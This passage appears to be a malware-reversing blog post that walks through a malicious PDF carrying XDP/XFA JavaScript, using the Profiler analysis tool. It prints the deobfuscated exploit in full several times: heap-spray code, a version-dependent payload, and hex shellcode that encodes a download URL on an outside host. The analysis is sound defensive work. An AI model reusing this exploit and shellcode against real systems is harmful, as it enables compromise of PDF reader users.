PDF/XDP Malware Reversing

Recently version 2.6 of Profiler has been released and among the improvements support for XDP has been introduced. For those of you who are unfamiliar with XPD, here’s the Wikipedia description:

“XML Data Package (XDP) is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.

XDP is XML 1.0 compliant. The XDP may be a standalone document or it may in turn be carried inside a PDF document.

XDP provides a mechanism for packaging form components within a surrounding XML container. An XDP can also package a PDF file, along with XML form and template data. When the XFA (XML Forms Architecture) grammars used for an XFA form are moved from one application to another, they must be packaged as an XML Data Package.”

So I’ll use the occasion to show the reversing of a nice PDF with all the goodies. Let’s open the suspicious PDF.

The PDF is already heavily flagged by Profiler, as it contains many suspicious features.

If we take a look, just out of curiosity, at the object 8 of the PDF we will notice that the XDP data contains a bogus endstream keyword to fool the parsers of security solutions.

Profiler handles this correctly, so we don’t have to do anything, just worth mentioning.

Let’s take a look at the raw XDP data.

As you can see, it is completely unreadable because of the XML escaped characters. Even this is not really important for us, since the XML parser of Profiler handles this automatically, again just worth mentioning.

So let’s open directly the embedded XDP child and we can see a readable and nicely indented XML.

We can see that the XML contains JavaScript code, but Profiler already warns us of this. So let’s just click on the warning.

The code isn’t readable. So let’s select the JavaScript portion and then press Ctrl+R->Beautify JavaScript.

Much better, isn’t it?

The code is quite easy to understand although it’s obfuscated. It takes a value straight from the XDP, processes it and then calls eval on it.

This is the value it takes:

What we want is the result of the processing, before eval is called. So what I did is to modify slightly the JavaScript code like this:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
ar = [HUGE STRING];
ar = ar.split('%%%');
s = Array();
cc = {
q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
}.q;
function test3()
{
if (s) v = ar[z] * 1;
s = s + cc[v + 24];
}
for (i = 0; i - 3794 < 0; i++)
{
z = i;
test3();
}
print(s);
ar = [HUGE STRING]; ar = ar.split('%%%'); s = Array(); cc = { q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM" }.q; function test3() { if (s) v = ar[z] * 1; s = s + cc[v + 24]; } for (i = 0; i - 3794 < 0; i++) { z = i; test3(); } print(s);
ar = [HUGE STRING];
ar = ar.split('%%%');
s = Array();
cc = {
    q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
}.q;
function test3()
{
    if (s) v = ar[z] * 1;
    s = s + cc[v + 24];
}

for (i = 0; i - 3794 < 0; i++)
{
    z = i;
    test3();
}

print(s);

I didn't paste now the entire value in here as it was way too big, but I did so in the code edit:

At this point, we can just press Ctrl+R->Debug/Execute JavaScript and get the result of the execution.

We will get the following code:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = app;
_l4 = new Array();
function _l5()
{
var _l6 = _l3.viewerVersion.toString();
_l6 = _l6.replace('.', '');
while (_l6.length < 4) _l6 += '0';
return parseInt(_l6, 10)
}
function _l7(_l8, _l9)
{
while (_l8.length * 2 < _l9) _l8 += _l8;
return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
_I1 = unescape(_I1);
roteDak = _I1.length * 2;
dakRote = unescape('%u9090');
spray = _l7(dakRote, 0x2000 - roteDak);
loxWhee = _I1 + spray;
loxWhee = _l7(loxWhee, 524098);
for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
while (_I1.length < len) _I1 += _I1;
return _I1.substring(0, len)
}
function _I3(_I1)
{
ret = '';
for (i = 0; i < _I1.length; i += 2)
{
b = _I1.substr(i, 2);
c = parseInt(b, 16);
ret += String.fromCharCode(c);
}
return ret
}
function _ji1(_I1, _I4)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6++)
{
_l9 = _I4.length;
_I7 = _I1.charCodeAt(_I6);
_I8 = _I4.charCodeAt(_I6 % _l9);
_I5 += String.fromCharCode(_I7 ^ _I8);
}
return _I5
}
function _I9(_I6)
{
_j0 = _I6.toString(16);
_j1 = _j0.length;
_I5 = (_j1 % 2) ? '0' + _j0 : _j0;
return _I5
}
function _j2(_I1)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
{
_I5 += '%u';
_I5 += _I9(_I1.charCodeAt(_I6 + 1));
_I5 += _I9(_I1.charCodeAt(_I6))
}
return _I5
}
function _j3()
{
_j4 = _l5();
if (_j4 < 9000)
{
_j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
_j6 = _l1;
_j7 = _I3(_j6)
}
else
{
_j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
_j6 = _l2;
_j7 = _I3(_j6)
}
_j8 = 'SUkqADggAABB';
_j9 = _I2('QUFB', 10984);
_ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
_ll1 = _j8 + _j9 + _ll0 + _j5;
_ll2 = _ji1(_j7, '');
if (_ll2.length % 2) _ll2 += unescape('%00');
_ll3 = _j2(_ll2);
with(
{
k: _ll3
}) _I0(k);
qwe123b.rawValue = _ll1
}
_j3();
var padding; var bbb, ccc, ddd, eee, fff, ggg, hhh; var pointers_a, i; var x = new Array(); var y = new Array(); var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000'; var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000'; _l3 = app; _l4 = new Array(); function _l5() { var _l6 = _l3.viewerVersion.toString(); _l6 = _l6.replace('.', ''); while (_l6.length < 4) _l6 += '0'; return parseInt(_l6, 10) } function _l7(_l8, _l9) { while (_l8.length * 2 < _l9) _l8 += _l8; return _l8.substring(0, _l9 / 2) } function _I0(_I1) { _I1 = unescape(_I1); roteDak = _I1.length * 2; dakRote = unescape('%u9090'); spray = _l7(dakRote, 0x2000 - roteDak); loxWhee = _I1 + spray; loxWhee = _l7(loxWhee, 524098); for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote; } function _I2(_I1, len) { while (_I1.length < len) _I1 += _I1; return _I1.substring(0, len) } function _I3(_I1) { ret = ''; for (i = 0; i < _I1.length; i += 2) { b = _I1.substr(i, 2); c = parseInt(b, 16); ret += String.fromCharCode(c); } return ret } function _ji1(_I1, _I4) { _I5 = ''; for (_I6 = 0; _I6 < _I1.length; _I6++) { _l9 = _I4.length; _I7 = _I1.charCodeAt(_I6); _I8 = _I4.charCodeAt(_I6 % _l9); _I5 += String.fromCharCode(_I7 ^ _I8); } return _I5 } function _I9(_I6) { _j0 = _I6.toString(16); _j1 = _j0.length; _I5 = (_j1 % 2) ? '0' + _j0 : _j0; return _I5 } function _j2(_I1) { _I5 = ''; for (_I6 = 0; _I6 < _I1.length; _I6 += 2) { _I5 += '%u'; _I5 += _I9(_I1.charCodeAt(_I6 + 1)); _I5 += _I9(_I1.charCodeAt(_I6)) } return _I5 } function _j3() { _j4 = _l5(); if (_j4 < 9000) { _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK'; _j6 = _l1; _j7 = _I3(_j6) } else { _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK'; _j6 = _l2; _j7 = _I3(_j6) } _j8 = 'SUkqADggAABB'; _j9 = _I2('QUFB', 10984); _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////'; _ll1 = _j8 + _j9 + _ll0 + _j5; _ll2 = _ji1(_j7, ''); if (_ll2.length % 2) _ll2 += unescape('%00'); _ll3 = _j2(_ll2); with( { k: _ll3 }) _I0(k); qwe123b.rawValue = _ll1 } _j3();
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = app;
_l4 = new Array();

function _l5()
{
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}
function _l7(_l8, _l9)
{
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524098);
    for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1)
{
    ret = '';
    for (i = 0; i < _I1.length; i += 2)
    {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++)
    {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6)
{
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
    {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function _j3()
{
    _j4 = _l5();
    if (_j4 < 9000)
    {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    }
    else
    {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%00');
    _ll3 = _j2(_ll2);
    with(
    {
        k: _ll3
    }) _I0(k);
    qwe123b.rawValue = _ll1
}
_j3();

What it does is basically to spray the heap using an array. It changes the payload based on the version of Adobe Reader. The version is retrieved by calling the _l5 function.

Now we could just examine the _l1 or _l2 payloads directly, but just to make sure I let the code generate a spray portion. So I changed the code accordingly and avoided to actually spray a lot of data.

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = this;
_l4 = new Array();
/*function _l5()
{
var _l6 = _l3.viewerVersion.toString();
_l6 = _l6.replace('.', '');
while (_l6.length < 4) _l6 += '0';
return parseInt(_l6, 10)
}*/
function _l7(_l8, _l9)
{
while (_l8.length * 2 < _l9) _l8 += _l8;
return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
_I1 = unescape(_I1);
roteDak = _I1.length * 2;
dakRote = unescape('%u9090');
spray = _l7(dakRote, 0x2000 - roteDak);
loxWhee = _I1 + spray;
loxWhee = _l7(loxWhee, 0x2000);
for (i = 0; i < 1; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
while (_I1.length < len) _I1 += _I1;
return _I1.substring(0, len)
}
function _I3(_I1)
{
ret = '';
for (i = 0; i < _I1.length; i += 2)
{
b = _I1.substr(i, 2);
c = parseInt(b, 16);
ret += String.fromCharCode(c);
}
return ret
}
function _ji1(_I1, _I4)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6++)
{
_l9 = _I4.length;
_I7 = _I1.charCodeAt(_I6);
_I8 = _I4.charCodeAt(_I6 % _l9);
_I5 += String.fromCharCode(_I7 ^ _I8);
}
return _I5
}
function _I9(_I6)
{
_j0 = _I6.toString(16);
_j1 = _j0.length;
_I5 = (_j1 % 2) ? '0' + _j0 : _j0;
return _I5
}
function _j2(_I1)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
{
_I5 += '%u';
_I5 += _I9(_I1.charCodeAt(_I6 + 1));
_I5 += _I9(_I1.charCodeAt(_I6))
}
return _I5
}
function asciiToHex(str)
{
var arr = [];
for (var n = 0, l = str.length; n < l; n ++)
{
var ch = str.charCodeAt(n);
var hex = Number(ch & 0xFF).toString(16);
if (hex.length < 2) hex = "0" + hex;
arr.push(hex);
hex = Number(ch >>> 8).toString(16);
while (hex.length < 2) hex = "0" + hex;
arr.push(hex);
}
return arr.join('');
}
function _j3()
{
_j4 = 9000;
if (_j4 < 9000)
{
_j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
_j6 = _l1;
_j7 = _I3(_j6)
}
else
{
_j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
_j6 = _l2;
_j7 = _I3(_j6)
}
_j8 = 'SUkqADggAABB';
_j9 = _I2('QUFB', 10984);
_ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
_ll1 = _j8 + _j9 + _ll0 + _j5;
_ll2 = _ji1(_j7, '');
if (_ll2.length % 2) _ll2 += unescape('%00');
_ll3 = _j2(_ll2);
with(
{
k: _ll3
}) _I0(k);
print(asciiToHex(_l4[0]));
}
_j3();
var padding; var bbb, ccc, ddd, eee, fff, ggg, hhh; var pointers_a, i; var x = new Array(); var y = new Array(); var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000'; var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000'; _l3 = this; _l4 = new Array(); /*function _l5() { var _l6 = _l3.viewerVersion.toString(); _l6 = _l6.replace('.', ''); while (_l6.length < 4) _l6 += '0'; return parseInt(_l6, 10) }*/ function _l7(_l8, _l9) { while (_l8.length * 2 < _l9) _l8 += _l8; return _l8.substring(0, _l9 / 2) } function _I0(_I1) { _I1 = unescape(_I1); roteDak = _I1.length * 2; dakRote = unescape('%u9090'); spray = _l7(dakRote, 0x2000 - roteDak); loxWhee = _I1 + spray; loxWhee = _l7(loxWhee, 0x2000); for (i = 0; i < 1; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote; } function _I2(_I1, len) { while (_I1.length < len) _I1 += _I1; return _I1.substring(0, len) } function _I3(_I1) { ret = ''; for (i = 0; i < _I1.length; i += 2) { b = _I1.substr(i, 2); c = parseInt(b, 16); ret += String.fromCharCode(c); } return ret } function _ji1(_I1, _I4) { _I5 = ''; for (_I6 = 0; _I6 < _I1.length; _I6++) { _l9 = _I4.length; _I7 = _I1.charCodeAt(_I6); _I8 = _I4.charCodeAt(_I6 % _l9); _I5 += String.fromCharCode(_I7 ^ _I8); } return _I5 } function _I9(_I6) { _j0 = _I6.toString(16); _j1 = _j0.length; _I5 = (_j1 % 2) ? '0' + _j0 : _j0; return _I5 } function _j2(_I1) { _I5 = ''; for (_I6 = 0; _I6 < _I1.length; _I6 += 2) { _I5 += '%u'; _I5 += _I9(_I1.charCodeAt(_I6 + 1)); _I5 += _I9(_I1.charCodeAt(_I6)) } return _I5 } function asciiToHex(str) { var arr = []; for (var n = 0, l = str.length; n < l; n ++) { var ch = str.charCodeAt(n); var hex = Number(ch & 0xFF).toString(16); if (hex.length < 2) hex = "0" + hex; arr.push(hex); hex = Number(ch >>> 8).toString(16); while (hex.length < 2) hex = "0" + hex; arr.push(hex); } return arr.join(''); } function _j3() { _j4 = 9000; if (_j4 < 9000) { _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK'; _j6 = _l1; _j7 = _I3(_j6) } else { _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK'; _j6 = _l2; _j7 = _I3(_j6) } _j8 = 'SUkqADggAABB'; _j9 = _I2('QUFB', 10984); _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////'; _ll1 = _j8 + _j9 + _ll0 + _j5; _ll2 = _ji1(_j7, ''); if (_ll2.length % 2) _ll2 += unescape('%00'); _ll3 = _j2(_ll2); with( { k: _ll3 }) _I0(k); print(asciiToHex(_l4[0])); } _j3();
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
